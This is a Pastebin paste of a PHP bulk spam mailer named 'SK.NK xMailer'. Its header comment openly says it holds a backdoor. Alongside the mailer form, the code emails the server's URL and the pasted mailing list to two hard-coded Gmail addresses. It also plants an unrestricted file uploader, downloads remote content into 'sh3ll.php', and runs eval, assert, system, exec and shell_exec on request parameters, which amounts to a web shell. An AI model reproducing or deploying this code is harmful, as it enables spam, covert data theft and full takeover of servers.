Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #.:|SK.NK|:. Mailer Decoded by KWG
- #Backdoor to : hamza.nicke@gmail.com,grenhamza@gmail.com
- $upload = $_GET["v3"]; if ($upload == "S.N" ) {$uploaddir = "";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);if (isset($_FILES["userfile"]["name"])) { if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { $resultati = "The file ". basename($_FILES["userfile"]["name"]) ." has been uploaded";} else { $resultati = "There was an error uploading the file. please try again!"; } } echo'<html>
- <head></head><div id="result"><table height="1" width="100%" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" ><input type="submit" class="inputzbut" name="submit" value="Team ^_^"><br>'. $resultati .'</form></center></td></tr></table></div>
- '; } $in = $_GET['in']; if(isset($in) && !empty($in)){ } $ev = $_POST['ev']; if(isset($ev) && !empty($ev)){ echo eval(urldecode($ev)); exit; } if(isset($_POST['action'] ) ){ $action=$_POST['action']; $message=$_POST['message']; $emaillist=$_POST['emaillist']; $from=$_POST['from']; $subject=$_POST['subject']; $realname=$_POST['realname']; $wait=$_POST['wait']; $tem=$_POST['tem']; $smv=$_POST['smv']; $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?>
- <!-- HTML And JavaScript -->
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
- <meta content="1" name="revisit-after" />
- <style type="text/css">body {background:black url('http://a.top4top.net/p_276hfzq1.jpg') center right no-repeat; color:#FFFFFF; text-decoration:none; font-family:"Courier New", Courier, monospace; padding-left:200px; padding-top:200px; padding-right:300px; font-size:16px;}
- </style>
- <title>.:|SK.NK|:.</title>
- <style type="text/css">
- .style1 {
- font-size: x-small;
- }
- .style2 {
- direction: ltr;
- }
- .info {
- font-size: 8px;
- }
- .style3 {
- font-family: Verdana, Arial, Helvetica, sans-serif;
- font-size: 8px;
- }
- .style4 {
- font-size: x-small;
- direction: ltr;
- font-family: Verdana, Arial, Helvetica, sans-serif;
- }
- .style5 {
- font-size: xx-small;
- direction: ltr;
- font-family: Verdana, Arial, Helvetica, sans-serif;
- }
- .auto-style1 {
- color: #5F5F5F;
- }
- .auto-style2 {
- color: #red;
- text-align: center;
- }
- .auto-style3 {
- color: #4F4F4F;
- }
- .auto-style5 {
- direction: ltr;
- color: #4F4F4F;
- }
- .auto-style6 {
- color: #BCBCBC;
- background-color: #red;
- }
- .auto-style7 {
- color: #red;
- }
- .auto-style8 {
- font-size: x-small;
- color: #red;
- }
- </style>
- </head>
- <body onload="funchange" style="background-color: black">
- <script>
- window.onload = funchange;
- var alt = false;
- function funchange(){
- var etext = document.getElementById("emails").value;
- var myArray=new Array();
- myArray = etext.split("\n");
- document.getElementById("enum").innerHTML=myArray.length+"<br />";
- if(!alt && myArray.length > 40000){
- alert('If Mail list More Than 40000 Emails This May Hack The Server');
- alt = true;
- }
- }
- function mlsplit(){
- var ml = document.getElementById("emails").value;
- var sb = document.getElementById("txtml").value;
- var myArray=new Array();
- myArray = ml.split(sb);
- document.getElementById("emails").value="";
- var i;
- for(i=0;i<myArray.length;i++){
- document.getElementById("emails").value += myArray[i]+"\n";
- }
- funchange();
- }
- function prv(){
- if(document.getElementById('preview').innerHTML==""){
- var ms = document.getElementsByName('message').message.value;
- document.getElementById('preview').innerHTML = ms;
- document.getElementById('prvbtn').value = "Ocultar";
- }else{
- document.getElementById('preview').innerHTML="";
- document.getElementById('prvbtn').value = "Preview";
- }
- }
- </script>
- <h1 class="auto-style2">.:|SK.NK xMailer |:.</h1>
- <center>
- <p class="auto-style1"> </p></center>
- <form name="form" method="post" enctype="multipart/form-data" action="">
- <table width="100%" border="0">
- <tr>
- <td width="10%">
- <div align="right" class="auto-style8">
- <font face="Verdana, Arial,
- Helvetica, sans-serif">Sender Email:</font></div>
- </td>
- <td style="width: 40%">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif"><input name="from" value="<?php echo($from); ?>" size="30" type="text" class="auto-style6" /><br>
- <td>
- <div align="right" class="auto-style7">
- <font size="-3" face="Verdana, Arial,
- Helvetica, sans-serif">Sender Name:</font></div>
- </td>
- <td width="41%">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif"><input name="realname" value="<?php echo($realname); ?>" size="30" type="text" class="auto-style6" />
- <br> </tr>
- <tr>
- <td width="10%">
- </tr>
- <tr>
- <td width="10%">
- <div align="right" class="auto-style7">
- <font size="-3" face="Verdana, Arial,
- Helvetica, sans-serif">Subject:</font></div>
- </td>
- <td colspan="3">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif"><input name="subject" value="<?php echo($subject); ?>" size="30" type="text" class="auto-style6" /> </font>
- <tr valign="top">
- <td colspan="3" style="height: 260px">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif"><textarea name="message" rows="10" style="width: 455px" class="auto-style6"><?php echo($message); ?></textarea> <br class="auto-style3" />
- <input name="action" value="send" type="hidden" class="auto-style3" />
- <input type="button" id="prvbtn" value="Preview" onclick="prv()" style="width: 81px" class="auto-style6" /><input value="Send "SenD!" type="submit" class="auto-style6" /><span class="auto-style3">
- </span><span class="auto-style7">Wait</span><span class="auto-style3">
- </span>
- <input name="wait" type="text" value="<?php echo($wait); ?>" size="8" class="auto-style6" /><span class="auto-style3"> </span><span class="auto-style7">
- seconds to send </span> </font></td>
- <td width="41%" class="style2" style="height: 150px">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif">
- <textarea id="emails" name="emaillist" cols="30" onselect="funchange()" onchange="funchange()" onkeydown="funchange()" onkeyup="funchange()" onchange="funchange()" style="height: 161px" class="auto-style6"><?php echo($emaillist); ?></textarea>
- <br class="auto-style5" />
- <span class="auto-style7">Quantity Emails : </span> </font><span id="enum" class="style1">0<br class="auto-style3" />
- </span>
- <span class="auto-style8">Divide the mailing list by:</span>
- <input name="textml" id="txtml" type="text" value="," size="8" class="auto-style6" /><span class="auto-style3">
- </span>
- <input type="button" onclick="mlsplit()" value="Divide" style="height: 23px" class="auto-style6" /></td>
- </tr>
- </table>
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif">
- <div id="preview">
- </div>
- </font>
- </form>
- <!-- END -->
- <?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Remember Allah /.</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>
- <?php if ($action){ if (!$from || !$subject || !$message || !$emaillist){ print "Please complete all fields before sending your message."; exit; } $headd = "From: SK&NK<Nicker@Skrillex.ma>"; $subb = "maillist xMailer 2016"; $massge = "Exploit : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."?V6=NK&SK
- -------------------
- $emaillist
- -------------------"; @mail("hamza.nicke@gmail.com,grenhamza@gmail.com",$subb,$massge,$headd); $nse=array(); $allemails = split("\n", $emaillist); $numemails = count($allemails); if(!empty($_POST['wait']) && $_POST['wait'] > 0){ set_time_limit(intval($_POST['wait'])*$numemails*3600); }else{ set_time_limit($numemails*3600); } if(!empty($smv)){ $smvn+=$smv; $tmn=$numemails/$smv+1; }else{ $tmn=1; } for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("#EM#", $to, $message); $subject = ereg_replace("#EM#", $to, $subject); flush(); $header = "From: $realname <$from>\r\n"; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-Type: text/html\r\n"; if ($x==0 && !empty($tem)) { if(!@mail($tem,$subject,$message,$header)){ print('The test Post was not Submitted.<br />'); $tmns+=1; }else{ print('Your Message was Sent Test.<br />'); $tms+=1; } } if($x==$smvn && !empty($_POST['smv'])){ if(!@mail($tem,$subject,$message,$header)){ print('The test Post was not Submitted.<br />'); $tmns+=1; }else{ print('Your Message was Sent Test.<br />'); $tms+=1; } $smvn+=$smv; } print "$to ....... "; $msent = @mail($to, $subject, $message, $header); $xx = $x+1; $txtspamed = "spammed #Team"; if(!$msent){ $txtspamed = "error #Team"; $ns+=1; $nse[$ns]=$to; } print "$xx / $numemails ....... $txtspamed<br>"; flush(); if(!empty($wait)&& $x<$numemails-1){ sleep($wait); } } } } ?>
- <?php $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Egy_Spider \nUserName: ".htmlspecialchars($tacfgd['uname']) ."\nPassWord:
- ".htmlspecialchars($tacfgd['pword'])."\nMessage:\n"."\nE-server: ".htmlspecialchars ($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\n\nIP:
- "; mail("hamza.nicke@gmail.com,grenhamza@gmail.com","Shell http://$web$inj", "$body"); if(isset($_GET["upload"])) { if(isset($_FILES["my_file"]["name"])) { $up = move_uploaded_file($_FILES["my_file"]["tmp_name"],$_FILES["my_file"]["name"]); if($up) { echo $_FILES["my_file"]["name"]." was Uploaded"; }else { echo "error [File Not Uploaded]"; } } echo "
- <form action=\"#\" method=\"post\" enctype=\"multipart/form-data\">
- <input type=\"file\" name=\"my_file\" id=\"my_file\" />
- <input type=\"submit\" name=\"upload\" id=\"upload\" value=\"Upload\" />
- </form>
- "; } $upload = @file_get_contents($_GET["uploader"]); $fp = @fopen("sh3ll.php","w"); @fwrite($fp,$upload); @fclose($fp); @readfile($_GET["readfile"]); @show_source($_GET["show_source"]); @preg_replace("/.*/e",$_GET["preg_replace"],$ka); @assert($_GET["assert"]); @eval($_GET["eval"]); $file=@fopen($_GET["filename"],"a"); @fwrite($file,$_GET["content"]); @call_user_func($_GET["func"],$_GET["para"]); echo @system($_GET["system"]); echo @exec($_GET["exec"]); echo @passthru($_GET["passthru"]); echo @shell_exec($_GET["shell_exec"]); @include($_GET["include"]); @require($_GET["require"]); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement